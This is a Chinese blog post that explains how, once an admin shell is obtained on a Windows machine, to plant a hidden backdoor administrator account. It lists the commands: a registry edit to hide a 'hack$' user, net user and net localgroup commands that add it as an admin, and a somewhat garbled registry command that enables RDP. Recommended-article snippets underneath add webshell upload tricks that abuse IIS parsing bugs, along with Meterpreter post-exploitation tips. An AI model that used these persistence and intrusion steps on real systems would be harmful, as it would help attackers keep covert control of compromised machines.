拿到Windows的shell后设置隐藏用户

最新推荐文章于 2024-11-22 22:07:56 发布
最新推荐文章于 2024-11-22 22:07:56 发布
阅读量249 收藏
点赞数 1
文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74263993/article/details/141424449
版权
  1. 拿到windows的管理员shell

  1. 打开Windows的远程登录端口3389


REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v 123 /T REG_DWORD /D 1

  1. 添加一个隐藏用户(用$便会隐藏)


net user hack$ 123456 /add

  1. 给用户设置进管理员组


net localgroup administrators hack$ /add

  1. 查看

没有发现hack$用户

但是在家庭其他用户还是能看见

  1. 允许你添加的用户进行远程连接


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal"此处填写用户名"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

小黑子不会打篮球
关注
shell从入门到精通(0)什么是shell
二进制君
11-10 761
Linux中的shell,是指一个面向用户的命令接口,接收用户输入的命令,并对命令进行处理,处理完毕后再将结果反馈给用户shell的英文含义是“壳”,它是相对于内核来说的,因为它是建立在内核的基础上,面向于用户的一种表现形式,比如我们看到一个球,见到的是它的壳,而非核。Shell 程序本身的功能是很弱的,比如文件操作、输入输出、进程管理等都得依赖内核。
一句话木马拿Shell与菜刀原理
悦分享
07-12 1651
1. 直接上传asp asa jsp cer php aspx htr cdx 格式的木马,不行就加个空格或是利用IIS6.0解析漏洞,常见格式:1.asp;1.jpg 或 1.asp;.jpg 或 1.asp;jpg2. 有时上传图片格式的木马,居然被程序检测拦截了,右键记事本打开木马,在代码最前面加上gif89a,再数据库备份备份成asp格式的木马拿下shell。3. 上传图片格式木马,复制地址到数据库备份备份成asp格式木马,有时不成功的话,就利用IIs6.0解析漏洞,格式:1.asp;
获取shell后各种命令及操作
2201_75387456的博客
05-31 1046
假设目标机器上有鼠标指针,那么说明可以输入内容,那我们就可以使用。这个时候,目标的记事本里就多出了一些内容,就是我们刚刚输入的。如果其它程序需要访问这个内网环境,就可以建立。目标机器输入东西的话,就可以获取到键盘记录。:显示自己当前系统的所有文件和文件夹。:列出当前路径下的所有文件和文件夹。指定一个自定义的变量,以确定输出格式。: 使用当前伪造的线程令牌运行进程。进行记录的导出,如果不想监听了才。:使用当前伪造的线程令牌运行进程。加载扩展后,我们可以使用基本的。当然,也可以上传很多扩展,比。
Windows权限维持1:账号隐藏
da_chuan_chuan的博客
12-30 3176
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
使用msfconsole拿到win2008 R2的shell并进行维权二(权限维持)
X_xsj6的博客
08-11 543
使用msfconsole拿到win2008 R2的shell并进行维权二(权限维持) 四、维权后门 4.1查询服务器信息 4.1.1查看当前用户以及权限 4.1.2查看当前已有用户 4.1.3查看当前计算机名 4.2权限维护: 4.2.1创建账户(创建新用户的密码必须符合密码复杂度) 4.2.2将新建账户加入到管理员组 4.2.3开启靶机远程桌面功能 reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\...
Windows留后门--教程(一)——Windows系统隐藏账户
热门推荐
W小哥
03-14 1万+
一、Windows系统隐藏账户介绍 系统隐藏账户是一种最为简单有效的权限维持方式,其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户,因为是隐藏账户,所以防守方是无法通过控制面板或命令行看到这个账户的。 二、Windows系统添加隐藏账户-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 环境: windows Server2012 IP: 192.168.226.128 2.1 第一种情况:攻击者控制某台机器,并执行添加用户指令 n
shell基础-脚本执行方式
彳亍
03-23 927
1. 输出命令echo命令格式:echo [选项] [输出的内容]选项:-e:支持反斜线控制的字符转换,也就是支持转义字符。下面说一下Linux中的转义字符的作用。 转义字符 作用 \\ 代表\本身。 \a 警告音。 \b 退格键,也就是向左退格删除一个字符。 \c 取消行尾的换行符。和“-n”选项一致。 \e ESCAPE键。 \f 翻页。
metasploit基础学习 渗透(拿shell)和后渗透(留后门)
qq_38348692的博客
08-10 3564
使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令: (1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引 (2)apt-get upgrade: 升级系统上安装的所有软件包 (3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级 专业术语 (1)Auxiliaries:辅助模块,负责执行扫...
Shell命令学习
qq_39251759的博客
10-07 1200
What is ShellShell 是一个应用程序,它连接了用户和 Linux 内核,让用户能够更加高效、安全、低成本地使用 Linux 内核,这就是 Shell 的本质。 Shell 本身并不是内核的一部分,它只是站在内核的基础上编写的一个应用程序,它和 QQ、Firefox 等其它软件没有什么区别。然而 Shell 也有着它的特殊性,就是开机立马启动,并呈现在用户面前;用户通过 Shell 来使用 Linux,不启动 Shell 的话,用户就没办法使用 Linux。 Shell 是如何连接用户和内
2024强网杯--babyheap house of apple2解法
2302_79542511的博客
11-19 665
但是一般用largbin attack的时候,我们一般都是让_IO_list_all指向我们构造的第二个进入largbin的chunk。这次比赛看到这道题想到了用house of apple2,但是卡在了它把_IO_wfile_jumps给清零了,然后根据house of apple的调用链,我就以为做不了,其实是我对这个地方的理解不深刻。其实,我们只需要申请一个和chunk2等大的chunk,使得chunk2脱离双向链表,就可以让_IO_list_all指向我们能控制的chunk1了。
java学习记录12
cwtlw的博客
11-22 250
本文主要介绍了ArrayList的方法使用。
2.langchain中的prompt模板 (FewShotPromptTemplate)
No trade is free, but my tutorials are.
11-21 366
示例数据是一个列表,每个元素是一个包含question和answer的字典。本教程展示了如何使用 LangChain 中的和来构建和运行提示,并通过语义相似度选择最相关的示例。这些工具在构建复杂的提示和生成高质量回答方面非常有用。希望这个教程对你有所帮助!希望这个教程对你有所帮助!如果有任何问题,欢迎随时提问。
【山大909算法题】2014-T1
LengYu_a的博客
11-22 231
为带表头的单链表类Chain编写一个成员函数Reverse,该函数对链表进行逆序操作(将链表中的结点按与原序相反的顺序连接),要求逆序操作就地进行,不分配任何新的结点。要求首先给出类的声明,在类的声明中,其它成员函数省略。定义三个指针变量,*prevNode、*currentNode、*nextNode,在遍历过程中反指。对第一个元素和最后一个的元素处理略有不同,需要单独处理。
java Queue 详解
最新发布
T_Y_F_的博客
11-22 576
java Queue 详解
Java Stream流
Aishangyuwen的博客
11-19 191
Stream流就相当于创建一条流水线,并将数据放在流水线上准备对其进行处理。
【开发小技巧11】用经典报表实现badge list效果,根据回显内容用颜色加以区分
clover_oreo的博客
11-22 355
之前使用badge list实现首页指标数据回显,但是无法根据对应数据进行个性化动态展示,那要如何解决呢?下面就来看看如何通过经典报表实现badge list效果,根据回显内容用颜色加以区分。
Echarts中柱状图完成横向布局
阿宝的博客
11-22 125
Echarts中柱状图完成横向布局。
Java中的TreeSet集合解析
muzitian的博客
11-21 917
对于TreeSet,最重要的方法是add()、remove()、contains()等方法,这些方法通过调用AbstractSet类中的方法实现。我们并没有使用Collections.sort()方法来对集合进行排序,而是使用了TreeSet函数,它会自动按照元素的自然排序进行排序。与其他集合不同,treeset会按照元素的自然排序对其进行排序。Stream.of("a1", "a2", "a3") .map(s -> s.substring(1)) // 对每个字符串元素从下标1位置开始截取。
Java使用stream进行分组汇总失效问题
yannsann的博客
11-19 220
在当前项目的开发任务中需要定制财务报表导出功能,格式比较特殊使用了VM。在汇总数据的过程中使用了stream.collect 进行分组汇总。在测试的过程中发现分组失败,最终原因是对象的对比方式问题,collect是根据对象对比的所以需要重写equals。应该有更好的实现方式,java使用的不是很熟练。之后有新思路再来更新。重写equals方法。
Windows Shell编程示例分析与教程
Windows Shell(也称为Windows Explorer Shell)是Windows操作系统的一部分,它负责管理文件系统,提供图形用户界面。在Windows中,Shell扩展是一种可以增强和定制Shell环境的方法。例如,右键菜单扩展、工具栏按钮...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值